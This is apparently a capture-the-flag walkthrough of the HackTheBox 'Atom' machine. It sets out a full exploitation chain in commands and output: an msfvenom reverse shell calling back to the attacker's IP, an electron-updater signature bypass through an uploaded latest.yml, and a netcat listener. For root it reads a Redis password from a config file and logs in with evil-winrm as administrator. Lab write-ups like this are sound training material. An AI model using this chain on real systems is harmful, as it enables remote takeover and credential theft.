Enumerating the open SMB share shows one interesting .PDF file (the directories client1, client2, client3 were empty).
smbclient \\\\10.10.10.237\\software_updates
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 20 20:03:50 2021
.. D 0 Tue Apr 20 20:03:50 2021
client1 D 0 Tue Apr 20 20:03:50 2021
client2 D 0 Tue Apr 20 20:03:50 2021
client3 D 0 Tue Apr 20 20:03:50 2021
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021
4413951 blocks of size 4096. 1358229 blocks available
smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (537.1 KiloBytes/sec) (average 537.1 KiloBytes/sec)The exploit is utilising a remote code execution in Electron updater. The article is very interesting and can be found here: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
Generate reverse shell payload using Metasploit:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.51 LPORT=8989 -f exe -o "r'rs.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: r'rs.exeGenerate a file hash for the reverse shell payload:
shasum -a 512 "r'rs.exe" | cut -d " " -f1 | xxd -r -p | base64
MH1lQ4zN7xIBVAEjuHzNep+75FL5CK+1y7pTo6IrQKFyouvMGwMY/6F6EF6bJUG+D+O5lD6DVBkMitYtZwLi4A==Upload the latest.yml file via smbclient
smbclient \\\\10.10.10.237\\software_updates
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> cd client1
smb: \client1\> put latest.yml
putting file latest.yml as \client1\latest.yml (3.4 kb/s) (average 3.4 kb/s)
smb: \client1\> dir
. D 0 Tue Apr 20 19:43:54 2021
.. D 0 Tue Apr 20 19:43:54 2021
latest.yml A 161 Tue Apr 20 19:43:54 2021
4413951 blocks of size 4096. 1358302 blocks available
smb: \client1\> Host the binary using Python SimpleHTTPServer:
python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 ...Use Netcat to catch the reverse shell:
nc -nvlp 8989If you look at the logs for Python’s SimpleHTTPServer we can see that the exploit is accessed:
10.10.10.237 - - [20/Apr/2021 19:43:55] code 404, message File not found
10.10.10.237 - - [20/Apr/2021 19:43:55] "GET /exploit/r%27rs.exe.blockmap HTTP/1.1" 404 -
10.10.10.237 - - [20/Apr/2021 19:43:55] "GET /exploit/r%27rs.exe HTTP/1.1" 200 -And looking back at Netcat, we’ve caught the shell:
[*] Command shell session 1 opened (10.10.14.51:8989 -> 10.10.10.237:52760) at 2021-04-20 nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.10.237] 52818
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
atom\jason
C:\WINDOWS\system32>cd C:\Users\Jason\Desktop
cd C:\Users\Jason\Desktop
C:\Users\jason\Desktop>type user.txt
type user.txt
fd-----------------------------d8Root Enumeration
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\
12/07/2019 02:14 AM <DIR> PerfLogs
04/09/2021 04:23 AM <DIR> Program Files
11/19/2020 12:42 AM <DIR> Program Files (x86)
04/25/2021 04:51 PM <DIR> Software_Updates
04/01/2021 03:53 AM <DIR> Users
04/24/2021 06:04 AM <DIR> Windows
03/31/2021 08:00 AM <DIR> xampp
0 File(s) 0 bytes
7 Dir(s) 5,375,549,440 bytes free
C:\>cd xampp
cd xampp
Access is denied.
C:\Program Files>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Program Files
04/09/2021 04:23 AM <DIR> .
04/09/2021 04:23 AM <DIR> ..
04/01/2021 04:50 AM <DIR> Common Files
03/31/2021 12:49 PM <DIR> CUAssistant
12/07/2019 02:50 AM <DIR> Internet Explorer
04/02/2021 07:38 PM <DIR> Microsoft Update Health Tools
12/07/2019 02:14 AM <DIR> ModifiableWindowsApps
03/31/2021 02:35 AM <DIR> nodejs
04/24/2021 06:05 AM <DIR> Redis
04/01/2021 07:49 PM <DIR> rempl
04/09/2021 04:23 AM <DIR> VMware
04/02/2021 07:52 PM <DIR> Windows Defender
04/04/2021 09:22 PM <DIR> Windows Defender Advanced Threat Protection
04/02/2021 07:52 PM <DIR> Windows Mail
04/02/2021 07:52 PM <DIR> Windows Media Player
12/07/2019 02:52 AM <DIR> Windows Multimedia Platform
12/07/2019 02:49 AM <DIR> Windows NT
04/02/2021 07:52 PM <DIR> Windows Photo Viewer
12/07/2019 02:52 AM <DIR> Windows Portable Devices
12/07/2019 02:31 AM <DIR> Windows Security
12/07/2019 02:31 AM <DIR> WindowsPowerShell
C:\Program Files\Redis>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Program Files\Redis
04/24/2021 06:05 AM <DIR> .
04/24/2021 06:05 AM <DIR> ..
07/01/2016 03:54 PM 1,024 EventLog.dll
04/02/2021 07:31 AM <DIR> Logs
07/01/2016 03:52 PM 12,618 Redis on Windows Release Notes.docx
07/01/2016 03:52 PM 16,769 Redis on Windows.docx
07/01/2016 03:55 PM 406,016 redis-benchmark.exe
07/01/2016 03:55 PM 4,370,432 redis-benchmark.pdb
07/01/2016 03:55 PM 257,024 redis-check-aof.exe
07/01/2016 03:55 PM 3,518,464 redis-check-aof.pdb
07/01/2016 03:55 PM 268,288 redis-check-dump.exe
07/01/2016 03:55 PM 3,485,696 redis-check-dump.pdb
07/01/2016 03:55 PM 482,304 redis-cli.exe
07/01/2016 03:55 PM 4,517,888 redis-cli.pdb
07/01/2016 03:55 PM 1,553,408 redis-server.exe
07/01/2016 03:55 PM 6,909,952 redis-server.pdb
04/02/2021 07:39 AM 43,962 redis.windows-service.conf
04/02/2021 07:37 AM 43,960 redis.windows.conf
07/01/2016 09:17 AM 14,265 Windows Service Documentation.docx
16 File(s) 25,902,070 bytes
3 Dir(s) 5,376,745,472 bytes free
C:\Program Files\Redis>type redis.windows.conf
type redis.windows.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
atom.htb:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:ids:User"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
atom.htb:6379> get "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
┌──(kali㉿kali)-[~/Desktop/HackTheBox/Atom/exploit]
└─$ evil-winrm -i 10.10.10.237 -u administrator -p 'kidvscat_admin_@123'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/2/2021 8:22 PM 608 dump.rdb
-a---- 4/2/2021 10:49 PM 204 run.bat
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> cd ..
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator> cd Desktop
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/24/2021 6:05 AM 34 root.txt
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> type root.txt
42----------------------------c2